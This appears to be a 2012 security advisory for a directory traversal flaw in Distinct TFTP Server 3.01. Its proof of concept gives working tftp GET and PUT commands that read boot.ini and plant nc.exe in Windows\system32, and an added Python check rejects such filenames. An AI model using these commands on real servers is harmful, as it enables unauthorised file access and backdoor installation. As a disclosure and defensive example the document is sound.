Proof of Concept
----------------
We assume that the configured TFTP root directory is deep enough, so you have to set a deep path in the server configuration. If a GET request containing '../../' (dot dot slash) sequences, aimed at the boot.ini file, is sent to Distinct TFTP Server 3.01, the file is retrieved successfully.
hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> get ../../../../../../../../../../../../../boot.ini
Received 211 bytes in 0.0 seconds
tftp>
Next, if we try to upload a file, say Netcat (nc.exe), to the Windows %systemroot% directory (C:\WINDOWS\system32\) using a PUT command, here is the result:
hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> put /Pentest/backdoor/nc.exe ../../../../../../../../../../../../../../../Windows/system32/nc.exe
Sent 59392 bytes in 0.3 seconds
tftp>
Netcat was uploaded successfully.
Other combinations:
tftp> get ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
tftp> put /Pentest/backdoor/nc.exe ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\nc.exe
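As an added example (not part of the original advisory or the vendor's product), the following Python shows the server-side check that would stop both request forms above: it parses a TFTP read/write request (RFC 1350 RRQ/WRQ layout), treats '/' and '\' alike as separators, and refuses any filename that would resolve outside the configured root. The root path and the sample packets are constructed for illustration.

```python
import posixpath
import struct

RRQ, WRQ = 1, 2  # RFC 1350 opcodes for read and write requests


def build_request(opcode: int, filename: str, mode: str = "octet") -> bytes:
    """Construct a sample RRQ/WRQ packet: opcode, filename, NUL, mode, NUL."""
    return struct.pack("!H", opcode) + filename.encode() + b"\0" + mode.encode() + b"\0"


def parse_request(packet: bytes):
    """Return (opcode, filename, mode) from an RRQ/WRQ packet; raise on anything else."""
    if len(packet) < 4:
        raise ValueError("packet too short")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in (RRQ, WRQ):
        raise ValueError("not a read/write request")
    fields = packet[2:].split(b"\0")
    if len(fields) < 3:  # filename, mode, and the empty tail after the final NUL
        raise ValueError("malformed request")
    return opcode, fields[0].decode("latin-1"), fields[1].decode("latin-1").lower()


def resolve_safe_path(root: str, requested: str):
    """Map a client-supplied filename onto the server root, or return None.

    Both '/' and '\\' are treated as separators, because a Windows server
    accepts either and the PoC uses both. The decision is made on path
    components rather than by searching for the substring '..', and the
    joined result is re-checked against the root as a second barrier.
    """
    root = posixpath.normpath(root)
    normalised = requested.replace("\\", "/")
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return None  # absolute or drive-letter path: reject outright
    parts = [p for p in normalised.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return None  # empty name or any parent-directory component
    candidate = posixpath.normpath(posixpath.join(root, *parts))
    if posixpath.commonpath([root, candidate]) != root:
        return None  # belt and braces: must still be inside the root
    return candidate


if __name__ == "__main__":
    # Constructed sample root and requests mirroring the advisory's two forms
    for name in ("../../../../boot.ini", "..\\..\\Windows\\system32\\nc.exe", "firmware/image.bin"):
        _, fname, _ = parse_request(build_request(RRQ, name))
        print(repr(fname), "->", resolve_safe_path("/srv/tftp", fname))
```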
Solution Status
---------------
Unavailable
Risk Factor
-----------
CVSS Base Score = 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Exploitability Subscore = 10
Impact Subscore = 4.9
CVSS Temporal Score = 5.2
Overall CVSS Score = 5.8
Risk factor = Medium
Credits
-------
Tom Gregory from Spentera Research
References
----------
http://www.spentera.com/advisories/2012/SPN-01-2012.pdf
Disclosure Timeline
-------------------
March 28, 2012, issue discovered
March 28, 2012, vendor contacted about the issue, no response
April 9, 2012, public advisory released